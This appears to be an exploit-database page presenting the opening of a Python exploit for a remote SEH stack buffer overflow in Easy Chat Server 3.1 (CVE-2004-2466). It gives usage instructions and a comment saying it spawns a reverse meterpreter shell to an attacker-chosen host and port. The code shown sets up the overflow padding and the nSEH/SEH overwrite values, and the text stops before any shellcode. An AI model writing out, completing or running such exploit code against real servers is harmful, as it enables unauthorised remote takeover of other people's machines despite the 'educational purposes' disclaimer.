Exploits / Vulnerability Discovered : 2022-08-01 |
Type : remote |
Platform : windows
This exploit / vulnerability Easy chat server 3.1 remote stack buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
#!/usr/bin/python3
import sys
import socket
from struct import pack
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
junk = b"A" * 217
nseh = pack("<L", 0x06eb9090) # short jump 6 bytes
seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL